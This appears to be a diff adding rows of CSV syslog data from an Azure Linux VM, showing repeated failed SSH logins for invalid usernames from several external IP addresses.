+12967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:03,UbuntuDevEnv,2019-06-26 04:18:02,auth,UbuntuDevEnv,info,Failed password for invalid user SC from 95.216.195.95 port 47076 ssh2,124723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SC,95.216.195.9,47076,,
+12968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:03,UbuntuDevEnv,2019-06-26 04:18:02,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 47076:11: Bye Bye [preauth],124723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,47076,,
+12969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:03,UbuntuDevEnv,2019-06-26 04:18:02,auth,UbuntuDevEnv,info,Disconnected from invalid user SC 95.216.195.95 port 47076 [preauth],124723,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SC,95.216.195.9,47076,,
+12970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:56,UbuntuDevEnv,2019-06-26 04:18:55,auth,UbuntuDevEnv,info,Invalid user aster from 177.23.90.10 port 38448,125292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aster,177.23.90.1,38448,,
+12971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:56,UbuntuDevEnv,2019-06-26 04:18:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,125292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+12972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:56,UbuntuDevEnv,2019-06-26 04:18:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:58,UbuntuDevEnv,2019-06-26 04:18:58,auth,UbuntuDevEnv,info,Failed password for invalid user aster from 177.23.90.10 port 38448 ssh2,125292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aster,177.23.90.1,38448,,
+12974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:58,UbuntuDevEnv,2019-06-26 04:18:58,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 38448:11: Bye Bye [preauth],125292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,38448,,
+12975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:18:58,UbuntuDevEnv,2019-06-26 04:18:58,auth,UbuntuDevEnv,info,Disconnected from invalid user aster 177.23.90.10 port 38448 [preauth],125292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aster,177.23.90.1,38448,,
+12976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:19:29,UbuntuDevEnv,2019-06-26 04:19:28,auth,UbuntuDevEnv,info,Invalid user ftpus3r from 95.216.195.95 port 35654,125407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpus3r,95.216.195.9,35654,,
+12977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:19:29,UbuntuDevEnv,2019-06-26 04:19:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:19:29,UbuntuDevEnv,2019-06-26 04:19:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,125407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+12979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:19:30,UbuntuDevEnv,2019-06-26 04:19:30,auth,UbuntuDevEnv,info,Failed password for invalid user ftpus3r from 95.216.195.95 port 35654 ssh2,125407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpus3r,95.216.195.9,35654,,
+12980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:19:30,UbuntuDevEnv,2019-06-26 04:19:30,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpus3r 95.216.195.95 port 35654 [preauth],125407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpus3r,95.216.195.9,35654,,
+12981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:19:30,UbuntuDevEnv,2019-06-26 04:19:30,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 35654:11: Bye Bye [preauth],125407,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,35654,,
+12982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:52,UbuntuDevEnv,2019-06-26 04:20:51,auth,UbuntuDevEnv,info,Invalid user lavinia from 196.41.208.238 port 64347,125708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lavinia,196.41.208.2,64347,,
+12983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:52,UbuntuDevEnv,2019-06-26 04:20:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,125708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+12984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:52,UbuntuDevEnv,2019-06-26 04:20:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:53,UbuntuDevEnv,2019-06-26 04:20:52,auth,UbuntuDevEnv,info,Invalid user kubuntu from 95.216.195.95 port 52870,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kubuntu,95.216.195.9,52870,,
+12986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:53,UbuntuDevEnv,2019-06-26 04:20:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:53,UbuntuDevEnv,2019-06-26 04:20:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+12988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:54,UbuntuDevEnv,2019-06-26 04:20:54,auth,UbuntuDevEnv,info,Failed password for invalid user kubuntu from 95.216.195.95 port 52870 ssh2,125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kubuntu,95.216.195.9,52870,,
+12989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:54,UbuntuDevEnv,2019-06-26 04:20:54,auth,UbuntuDevEnv,info,Disconnected from invalid user kubuntu 95.216.195.95 port 52870 [preauth],125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kubuntu,95.216.195.9,52870,,
+12990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:54,UbuntuDevEnv,2019-06-26 04:20:54,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 52870:11: Bye Bye [preauth],125714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,52870,,
+12991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:55,UbuntuDevEnv,2019-06-26 04:20:54,auth,UbuntuDevEnv,info,Failed password for invalid user lavinia from 196.41.208.238 port 64347 ssh2,125708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lavinia,196.41.208.2,64347,,
+12992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:55,UbuntuDevEnv,2019-06-26 04:20:54,auth,UbuntuDevEnv,info,Disconnected from invalid user lavinia 196.41.208.238 port 64347 [preauth],125708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lavinia,196.41.208.2,64347,,
+12993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:20:55,UbuntuDevEnv,2019-06-26 04:20:54,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 64347:11: Bye Bye [preauth],125708,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,64347,,
+12994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:21:21,UbuntuDevEnv,2019-06-26 04:21:21,auth,UbuntuDevEnv,info,Invalid user gozone from 177.23.90.10 port 45054,125810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gozone,177.23.90.1,45054,,
+12995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:21:21,UbuntuDevEnv,2019-06-26 04:21:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,125810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+12996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:21:21,UbuntuDevEnv,2019-06-26 04:21:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,125810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:21:23,UbuntuDevEnv,2019-06-26 04:21:23,auth,UbuntuDevEnv,info,Failed password for invalid user gozone from 177.23.90.10 port 45054 ssh2,125810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gozone,177.23.90.1,45054,,
+12998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:21:23,UbuntuDevEnv,2019-06-26 04:21:23,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 45054:11: Bye Bye [preauth],125810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,45054,,
+12999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:21:23,UbuntuDevEnv,2019-06-26 04:21:23,auth,UbuntuDevEnv,info,Disconnected from invalid user gozone 177.23.90.10 port 45054 [preauth],125810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gozone,177.23.90.1,45054,,
+13000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:22:17,UbuntuDevEnv,2019-06-26 04:22:17,auth,UbuntuDevEnv,info,Invalid user 424246 from 95.216.195.95 port 41790,126022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,41790,,
+13001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:22:17,UbuntuDevEnv,2019-06-26 04:22:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:22:17,UbuntuDevEnv,2019-06-26 04:22:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,126022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:22:19,UbuntuDevEnv,2019-06-26 04:22:19,auth,UbuntuDevEnv,info,Failed password for invalid user 424246 from 95.216.195.95 port 41790 ssh2,126022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,41790,,
+13004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:22:19,UbuntuDevEnv,2019-06-26 04:22:19,auth,UbuntuDevEnv,info,Disconnected from invalid user 424246 95.216.195.95 port 41790 [preauth],126022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,41790,,
+13005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:22:19,UbuntuDevEnv,2019-06-26 04:22:19,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 41790:11: Bye Bye [preauth],126022,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,41790,,
+13006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:02,UbuntuDevEnv,2019-06-26 04:23:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:02,UbuntuDevEnv,2019-06-26 04:23:01,auth,UbuntuDevEnv,info,Invalid user yebni from 196.41.208.238 port 26103,126171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,196.41.208.2,26103,,
+13008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:02,UbuntuDevEnv,2019-06-26 04:23:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,126171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:04,UbuntuDevEnv,2019-06-26 04:23:03,auth,UbuntuDevEnv,info,Failed password for invalid user yebni from 196.41.208.238 port 26103 ssh2,126171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,196.41.208.2,26103,,
+13010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:04,UbuntuDevEnv,2019-06-26 04:23:03,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 26103:11: Bye Bye [preauth],126171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,26103,,
+13011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:04,UbuntuDevEnv,2019-06-26 04:23:03,auth,UbuntuDevEnv,info,Disconnected from invalid user yebni 196.41.208.238 port 26103 [preauth],126171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yebni,196.41.208.2,26103,,
+13012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:40,UbuntuDevEnv,2019-06-26 04:23:40,auth,UbuntuDevEnv,info,Invalid user bungee from 177.23.90.10 port 44662,126303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bungee,177.23.90.1,44662,,
+13013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:40,UbuntuDevEnv,2019-06-26 04:23:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:40,UbuntuDevEnv,2019-06-26 04:23:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=177.23.90.10,126303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,177.23.90.1,,0,
+13015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:42,UbuntuDevEnv,2019-06-26 04:23:42,auth,UbuntuDevEnv,info,Failed password for invalid user bungee from 177.23.90.10 port 44662 ssh2,126303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bungee,177.23.90.1,44662,,
+13016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:42,UbuntuDevEnv,2019-06-26 04:23:42,auth,UbuntuDevEnv,info,Disconnected from invalid user bungee 177.23.90.10 port 44662 [preauth],126303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bungee,177.23.90.1,44662,,
+13017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:42,UbuntuDevEnv,2019-06-26 04:23:42,auth,UbuntuDevEnv,info,Received disconnect from 177.23.90.10 port 44662:11: Bye Bye [preauth],126303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,177.23.90.1,44662,,
+13018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:46,UbuntuDevEnv,2019-06-26 04:23:45,auth,UbuntuDevEnv,info,Invalid user 424246 from 95.216.195.95 port 59020,126341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,59020,,
+13019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:46,UbuntuDevEnv,2019-06-26 04:23:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:46,UbuntuDevEnv,2019-06-26 04:23:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,126341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:48,UbuntuDevEnv,2019-06-26 04:23:47,auth,UbuntuDevEnv,info,Failed password for invalid user 424246 from 95.216.195.95 port 59020 ssh2,126341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,59020,,
+13022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:48,UbuntuDevEnv,2019-06-26 04:23:47,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 59020:11: Bye Bye [preauth],126341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,59020,,
+13023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:23:48,UbuntuDevEnv,2019-06-26 04:23:47,auth,UbuntuDevEnv,info,Disconnected from invalid user 424246 95.216.195.95 port 59020 [preauth],126341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,95.216.195.9,59020,,
+13024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:13,UbuntuDevEnv,2019-06-26 04:24:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:13,UbuntuDevEnv,2019-06-26 04:24:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,126379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+13026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:24:13,UbuntuDevEnv,2019-06-26 04:24:13,auth,UbuntuDevEnv,info,Invalid user salman from 45.55.190.46 port 48744,126379,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,salman,45.55.190.4,48744,,
